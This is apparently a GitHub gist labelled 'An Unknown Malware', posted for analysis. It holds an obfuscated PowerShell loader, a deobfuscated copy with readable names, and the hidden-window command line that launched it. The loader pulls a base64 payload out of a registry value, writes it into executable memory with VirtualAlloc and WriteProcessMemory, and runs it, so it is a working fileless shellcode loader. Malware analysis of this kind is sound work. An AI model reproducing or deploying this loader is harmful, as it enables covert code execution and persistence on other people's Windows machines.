Created
August 6, 2018 15:01
-
-
Save NathanTheGr8/cfca0126c2d32c307007ec488ea24d3d to your computer and use it in GitHub Desktop.
An Unknown Malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$SEf8caWj = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";$lZ7VgLztH = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";function ogbehJFrvi{Param([OutputType([Type])][Parameter( Position = 0)][Type[]]$jbvI6kAQ = (New-Object Type[](0)),[Parameter( Position = 1 )][Type]$TnlpqF = [Void])$SDaRf4 = [AppDomain]::CurrentDomain;$gV2cj6vD = New-Object System.Reflection.AssemblyName('ReflectedDelegate');$koQPMj5 = $SDaRf4.DefineDynamicAssembly($gV2cj6vD, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);$mQQYfW = $koQPMj5.DefineDynamicModule('InMemoryModule', $false);$OSepm3U = $mQQYfW.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$GetNMD0W = $OSepm3U.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $jbvI6kAQ);$GetNMD0W.SetImplementationFlags('Runtime, Managed');$KBBPUUP = $OSepm3U.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $TnlpqF, $jbvI6kAQ);$KBBPUUP.SetImplementationFlags('Runtime, Managed');Write-Output $OSepm3U.CreateType();}function E66iaPG5($msLPAB, $r9dr88) {$ycPUx = $msLPAB[$r9dr88+0] * 16777216;$ycPUx += $msLPAB[$r9dr88+1] * 65536;$ycPUx += $msLPAB[$r9dr88+2] * 256;$ycPUx += $msLPAB[$r9dr88+3] * 1;return $ycPUx;}$wFNcJpGX = @" | |
[DllImport("kernel32.dll")]public static extern IntPtr GetCurrentProcess();[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);[DllImport("kernel32.dll")]public static extern uint SetErrorMode(uint uMode); | |
"@ | |
$Xf7iI2 = Add-Type -memberDefinition $wFNcJpGX -Name "Win32" -namespace Win32Functions -passthru;function OaI9ZGaig5($wFNcJpGX, $dAau1, $M5hD1rY) {$r9PSH = $Xf7iI2::GetCurrentProcess();$hOVIPH = $Xf7iI2::VirtualAlloc(0,$wFNcJpGX.Length,0x00003000,0x40);$KpfaBcgtS = $Xf7iI2::VirtualAlloc(0,$M5hD1rY.Length,0x00003000,0x40);$Xf7iI2::WriteProcessMemory($r9PSH, $hOVIPH, $wFNcJpGX, $wFNcJpGX.Length, 0) | Out-Null;$Xf7iI2::WriteProcessMemory($r9PSH, $KpfaBcgtS, $M5hD1rY, $M5hD1rY.Length, 0) | Out-Null;$MNZhhv = [IntPtr]($hOVIPH.ToInt64()+$dAau1);$JjmOV = ogbehJFrvi @([IntPtr], [IntPtr]) ([Void]);$DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MNZhhv, $JjmOV);$Xf7iI2::SetErrorMode(0x8006) | Out-Null;$DFAhyM.Invoke($KpfaBcgtS, $hOVIPH);}function iPpKRn8YS($wiIvdTk9qx, $XA1pa) {$IahTr = E66iaPG5 $wiIvdTk9qx 1;$mi0LSt1A = 5;while ($mi0LSt1A+8 -lt $IahTr) {$QheRB6j6 = $wiIvdTk9qx[$mi0LSt1A];$z2i2CBvTZG = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+1);$UAaIjo1Ssa = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+5);$mi0LSt1A += 9;if ($QheRB6j6 -eq $XA1pa) {OaI9ZGaig5 $wiIvdTk9qx[$mi0LSt1A..($mi0LSt1A+$z2i2CBvTZG)] $UAaIjo1Ssa $wiIvdTk9qx;break;} else {$mi0LSt1A += $z2i2CBvTZG;}}}$naO5fn = (Get-ItemProperty -Path "$SEf8caWj" -Name "$lZ7VgLztH").$lZ7VgLztH;$wiIvdTk9qx = [System.Convert]::FromBase64String($naO5fn);$wiIvdTk9qx[0] = 0;if ([IntPtr]::Size -eq 8) {iPpKRn8YS $wiIvdTk9qx 2;} else {iPpKRn8YS $wiIvdTk9qx 1;} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Related resources | |
# - https://github.com/EmpireProject/Empire/blob/master/data/module_source/ImportTable_execution/Invoke-DllInjection.ps1 | |
# - http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html | |
$RegKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell"; | |
$RegName = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}"; | |
function Get-DelegateType { | |
Param | |
( | |
[OutputType([Type])] | |
[Parameter( Position = 0)] | |
[Type[]] | |
$Parameters = (New-Object Type[](0)), | |
[Parameter( Position = 1 )] | |
[Type] | |
$ReturnType = [Void] | |
) | |
$Domain = [AppDomain]::CurrentDomain; | |
$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate'); | |
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run); | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false); | |
$TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]); | |
$ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters); | |
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed'); | |
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters); | |
$MethodBuilder.SetImplementationFlags('Runtime, Managed'); | |
Write-Output $TypeBuilder.CreateType(); | |
} | |
function Unknown-FunctionTwo($F2DataIn, $Integer_2) { | |
$DataOut = $F2DataIn[$Integer_2+0] * 16777216; | |
$DataOut += $F2DataIn[$Integer_2+1] * 65536; | |
$DataOut += $F2DataIn[$Integer_2+2] * 256; | |
$DataOut += $F2DataIn[$Integer_2+3] * 1; | |
return $DataOut; | |
} | |
$ImportTable = @" | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr GetCurrentProcess(); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport("kernel32.dll")] | |
public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written); | |
[DllImport("kernel32.dll")] | |
public static extern uint SetErrorMode(uint uMode); | |
"@ | |
$WinFunc = Add-Type -memberDefinition $ImportTable -Name "Win32" -namespace Win32Functions -passthru; | |
function Unknown-FunctionThree($ImportTable, $dAau1, $M5hD1rY) { | |
$HandlerGetCurrentProcess = $WinFunc::GetCurrentProcess(); | |
$HandlerVirtualAlloc1 = $WinFunc::VirtualAlloc(0, $ImportTable.Length, 0x00003000, 0x40); | |
$HandlerVirtualAlloc2 = $WinFunc::VirtualAlloc(0, $M5hD1rY.Length, 0x00003000, 0x40); | |
$WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc1, $ImportTable, $ImportTable.Length, 0) | Out-Null; | |
$WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc2, $M5hD1rY, $M5hD1rY.Length, 0) | Out-Null; | |
$IntOfHandlerVirtualAlloc1PlusdAau1 = [IntPtr]($HandlerVirtualAlloc1.ToInt64()+$dAau1); | |
$JjmOV = Get-DelegateType @([IntPtr], [IntPtr]) ([Void]); | |
$DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IntOfHandlerVirtualAlloc1PlusdAau1, $JjmOV); | |
$WinFunc::SetErrorMode(0x8006) | Out-Null; | |
$DFAhyM.Invoke($HandlerVirtualAlloc2, $HandlerVirtualAlloc1); | |
} | |
function Unknown-FunctionFour($ByteArrayFromEnImportTabledData, $integer_1) { | |
$IahTr = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData 1; | |
$value_5 = 5; | |
while ($value_5+8 -lt $IahTr) { | |
$QheRB6j6 = $ByteArrayFromEnImportTabledData[$value_5]; | |
$z2i2CBvTZG = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+1); | |
$UAaIjo1Ssa = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+5); | |
$value_5 += 9; | |
if ($QheRB6j6 -eq $integer_1) { | |
Unknown-FunctionThree $ByteArrayFromEnImportTabledData[$value_5..($value_5+$z2i2CBvTZG)] $UAaIjo1Ssa $ByteArrayFromEnImportTabledData; | |
break; | |
} else { | |
$value_5 += $z2i2CBvTZG; | |
} | |
} | |
} | |
$EnImportTabledData = (Get-ItemProperty -Path "$RegKey" -Name "$RegName").$RegName; | |
$ByteArrayFromEnImportTabledData = [System.Convert]::FromBase64String($EnImportTabledData); | |
$ByteArrayFromEnImportTabledData[0] = 0; | |
if ([IntPtr]::Size -eq 8) { | |
# x64 branch | |
Unknown-FunctionFour $ByteArrayFromEnImportTabledData 2; | |
} else { | |
# x86 branch | |
Unknown-FunctionFour $ByteArrayFromEnImportTabledData 1; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
C:\Windows\System32\WindowsPowershell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodeCommand $ S E f 8 c a W j   =   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ S h e l l " ; $ l Z 7 V g L z t H   =   " { 4 F F 2 3 B 3 8 - C 5 A 1 - 5 C B E - F 2 5 D 4 5 8 E 1 F 8 C 5 6 4 2 } " ; f u n c t i o n   o g b e h J F r v i { P a r a m ( [ O u t p u t T y p e ( [ T y p e ] ) ] [ P a r a m e t e r (   P o s i t i o n   =   0 ) ] [ T y p e [ ] ] $ j b v I 6 k A Q   =   ( N e w - O b j e c t   T y p e [ ] ( 0 ) ) , [ P a r a m e t e r (   P o s i t i o n   =   1   ) ] [ T y p e ] $ T n l p q F   =   [ V o i d ] ) $ S D a R f 4   =   [ A p p D o m a i n ] : : C u r r e n t D o m a i n ; $ g V 2 c j 6 v D   =   N e w - O b j e c t   S y s t e m . R e f l e c t i o n . A s s e m b l y N a m e ( ' R e f l e c t e d D e l e g a t e ' ) ; $ k o Q P M j 5   =   $ S D a R f 4 . D e f i n e D y n a m i c A s s e m b l y ( $ g V 2 c j 6 v D ,   [ S y s t e m . R e f l e c t i o n . E m i t . A s s e m b l y B u i l d e r A c c e s s ] : : R u n ) ; $ m Q Q Y f W   =   $ k o Q P M j 5 . D e f i n e D y n a m i c M o d u l e ( ' I n M e m o r y M o d u l e ' ,   $ f a l s e ) ; $ O S e p m 3 U   =   $ m Q Q Y f W . D e f i n e T y p e ( ' M y D e l e g a t e T y p e ' ,   ' C l a s s ,   P u b l i c ,   S e a l e d ,   A n s i C l a s s ,   A u t o C l a s s ' ,   [ S y s t e m . M u l t i c a s t D e l e g a t e ] ) ; $ G e t N M D 0 W   =   $ O S e p m 3 U . D e f i n e C o n s t r u c t o r ( ' R T S p e c i a l N a m e ,   H i d e B y S i g ,   P u b l i c ' ,   [ S y s t e m . R e f l e c t i o n . C a l l i n g C o n v e n t i o n s ] : : S t a n d a r d ,   $ j b v I 6 k A Q ) ; $ G e t N M D 0 W . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' ) ; $ K B B P U U P   =   $ O S e p m 3 U . D e f i n e M e t h o d ( ' I n v o k e ' ,   ' P u b l i c ,   H i d e B y S i g ,   N e w S l o t ,   V i r t u a l ' ,   $ T n l p q F ,   $ j b v I 6 k A Q ) ; $ K B B P U U P . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' ) ; W r i t e - O u t p u t   $ O S e p m 3 U . C r e a t e T y p e ( ) ; } f u n c t i o n   E 6 6 i a P G 5 ( $ m s L P A B ,   $ r 9 d r 8 8 )   { $ y c P U x     =   $ m s L P A B [ $ r 9 d r 8 8 + 0 ]   *   1 6 7 7 7 2 1 6 ; $ y c P U x   + =   $ m s L P A B [ $ r 9 d r 8 8 + 1 ]   *   6 5 5 3 6 ; $ y c P U x   + =   $ m s L P A B [ $ r 9 d r 8 8 + 2 ]   *   2 5 6 ; $ y c P U x   + =   $ m s L P A B [ $ r 9 d r 8 8 + 3 ]   *   1 ; r e t u r n   $ y c P U x ; } $ w F N c J p G X   =   @ " 
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   G e t C u r r e n t P r o c e s s ( ) ; [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i r t u a l A l l o c ( I n t P t r   l p A d d r e s s ,   u i n t   d w S i z e ,   u i n t   f l A l l o c a t i o n T y p e ,   u i n t   f l P r o t e c t ) ; [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   b o o l   W r i t e P r o c e s s M e m o r y ( I n t P t r   p r o c e s s ,   I n t P t r   a d d r e s s ,   b y t e [ ]   b u f f e r ,   u i n t   s i z e ,   u i n t   w r i t t e n ) ; [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   u i n t   S e t E r r o r M o d e ( u i n t   u M o d e ) ; 
 " @ 
 $ X f 7 i I 2   =   A d d - T y p e   - m e m b e r D e f i n i t i o n   $ w F N c J p G X   - N a m e   " W i n 3 2 "   - n a m e s p a c e   W i n 3 2 F u n c t i o n s   - p a s s t h r u ; f u n c t i o n   O a I 9 Z G a i g 5 ( $ w F N c J p G X ,   $ d A a u 1 ,   $ M 5 h D 1 r Y )   { $ r 9 P S H   =   $ X f 7 i I 2 : : G e t C u r r e n t P r o c e s s ( ) ; $ h O V I P H   =   $ X f 7 i I 2 : : V i r t u a l A l l o c ( 0 , $ w F N c J p G X . L e n g t h , 0 x 0 0 0 0 3 0 0 0 , 0 x 4 0 ) ; $ K p f a B c g t S   =   $ X f 7 i I 2 : : V i r t u a l A l l o c ( 0 , $ M 5 h D 1 r Y . L e n g t h , 0 x 0 0 0 0 3 0 0 0 , 0 x 4 0 ) ; $ X f 7 i I 2 : : W r i t e P r o c e s s M e m o r y ( $ r 9 P S H ,   $ h O V I P H ,   $ w F N c J p G X ,   $ w F N c J p G X . L e n g t h ,   0 )   |   O u t - N u l l ; $ X f 7 i I 2 : : W r i t e P r o c e s s M e m o r y ( $ r 9 P S H ,   $ K p f a B c g t S ,   $ M 5 h D 1 r Y ,   $ M 5 h D 1 r Y . L e n g t h ,   0 )   |   O u t - N u l l ; $ M N Z h h v   =   [ I n t P t r ] ( $ h O V I P H . T o I n t 6 4 ( ) + $ d A a u 1 ) ; $ J j m O V   =   o g b e h J F r v i   @ ( [ I n t P t r ] ,   [ I n t P t r ] )   ( [ V o i d ] ) ; $ D F A h y M   =   [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( $ M N Z h h v ,   $ J j m O V ) ; $ X f 7 i I 2 : : S e t E r r o r M o d e ( 0 x 8 0 0 6 )   |   O u t - N u l l ; $ D F A h y M . I n v o k e ( $ K p f a B c g t S ,   $ h O V I P H ) ; } f u n c t i o n   i P p K R n 8 Y S ( $ w i I v d T k 9 q x ,   $ X A 1 p a )   { $ I a h T r   =   E 6 6 i a P G 5   $ w i I v d T k 9 q x   1 ; $ m i 0 L S t 1 A   =   5 ; w h i l e   ( $ m i 0 L S t 1 A + 8   - l t   $ I a h T r )   { $ Q h e R B 6 j 6   =   $ w i I v d T k 9 q x [ $ m i 0 L S t 1 A ] ; $ z 2 i 2 C B v T Z G   =   E 6 6 i a P G 5   $ w i I v d T k 9 q x   ( $ m i 0 L S t 1 A + 1 ) ; $ U A a I j o 1 S s a   =   E 6 6 i a P G 5   $ w i I v d T k 9 q x   ( $ m i 0 L S t 1 A + 5 ) ; $ m i 0 L S t 1 A   + =   9 ; i f   ( $ Q h e R B 6 j 6   - e q   $ X A 1 p a )   { O a I 9 Z G a i g 5   $ w i I v d T k 9 q x [ $ m i 0 L S t 1 A . . ( $ m i 0 L S t 1 A + $ z 2 i 2 C B v T Z G ) ]   $ U A a I j o 1 S s a   $ w i I v d T k 9 q x ; b r e a k ; }   e l s e   { $ m i 0 L S t 1 A   + =   $ z 2 i 2 C B v T Z G ; } } } $ n a O 5 f n   =   ( G e t - I t e m P r o p e r t y   - P a t h   " $ S E f 8 c a W j "   - N a m e   " $ l Z 7 V g L z t H " ) . $ l Z 7 V g L z t H ; $ w i I v d T k 9 q x   =   [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ n a O 5 f n ) ; $ w i I v d T k 9 q x [ 0 ]   =   0 ; i f   ( [ I n t P t r ] : : S i z e   - e q   8 )   { i P p K R n 8 Y S   $ w i I v d T k 9 q x   2 ; }   e l s e   { i P p K R n 8 Y S   $ w i I v d T k 9 q x   1 ; } 
  |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment